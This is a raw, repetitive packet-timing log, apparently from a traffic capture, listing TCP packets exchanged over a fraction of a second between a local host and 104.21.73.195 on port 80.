                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874737024 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874754906 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874813080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874819994 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874825001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874861956 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874875069 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874877930 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874887943 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874898911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874912977 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874929905 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.874941111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875046015 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875057936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875071049 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875097036 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875114918 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875232935 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875246048 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875284910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875293016 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875298023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875319958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875333071 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875413895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875427008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875458956 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875466108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875478983 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875503063 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875507116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875543118 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875547886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875560999 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875596046 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875610113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875623941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875647068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875655890 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875658035 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875706911 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875729084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875741959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875752926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875776052 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875782967 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875797987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875818968 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875977039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.875989914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876018047 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876053095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876106977 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876127958 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876136065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876159906 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876173019 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876194000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876230001 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876243114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876257896 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876291037 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876324892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876338959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876349926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876375914 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876399040 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876411915 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876422882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876440048 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876461983 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876502037 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876514912 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876527071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876559973 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876564026 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876586914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876593113 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876600027 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876621962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876631021 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876699924 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876743078 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876749992 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876877069 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876919985 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876924038 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876936913 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876974106 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.876995087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877046108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877084017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877096891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877109051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877120018 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877130985 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877144098 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877156019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877162933 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877168894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877191067 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877221107 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877254963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877275944 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877290964 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877325058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877337933 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877348900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877361059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877362013 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877389908 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877414942 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877451897 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877458096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877470970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877501965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877507925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877547979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877562046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877573013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877585888 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877599001 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877841949 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877856016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877897978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877917051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877938986 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877953053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877964973 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.877974033 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878000975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878005028 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878014088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878050089 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878057957 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878071070 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878082037 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878104925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878128052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878140926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878165007 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878187895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878200054 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878211021 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878225088 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878233910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878243923 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878245115 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878268003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878290892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878297091 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878325939 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878343105 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878355026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878377914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878390074 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878398895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878423929 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878433943 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878817081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878856897 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878870964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878884077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878895044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878906012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878917933 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878937960 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878946066 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.878958941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879004002 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879021883 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879034996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879045963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879057884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879070044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879071951 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879091978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879100084 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879103899 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879134893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879134893 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879154921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879169941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879192114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879225969 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879234076 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879246950 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879256964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879277945 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879298925 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879311085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879322052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879333973 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879359007 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879359007 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879380941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879411936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879754066 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879790068 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879822969 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879836082 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879848003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879858971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879861116 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879885912 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879889011 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879899979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879940033 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879964113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.879976034 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880000114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880032063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880055904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880070925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880103111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880115986 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880141020 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880151987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880188942 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880222082 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880268097 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880304098 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880642891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880683899 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880723953 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880743980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880806923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880820036 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880845070 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880867958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.880903006 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881055117 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881143093 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881180048 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881179094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881192923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881215096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881226063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881232023 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881237984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881258965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881275892 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881298065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881303072 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881319046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881356955 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881370068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881411076 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881422997 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881443024 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881464958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881486893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881501913 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881516933 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881539106 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881561995 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881584883 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881619930 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881638050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881704092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881716013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881738901 CET4970680192.168.2.5104.21.73.195
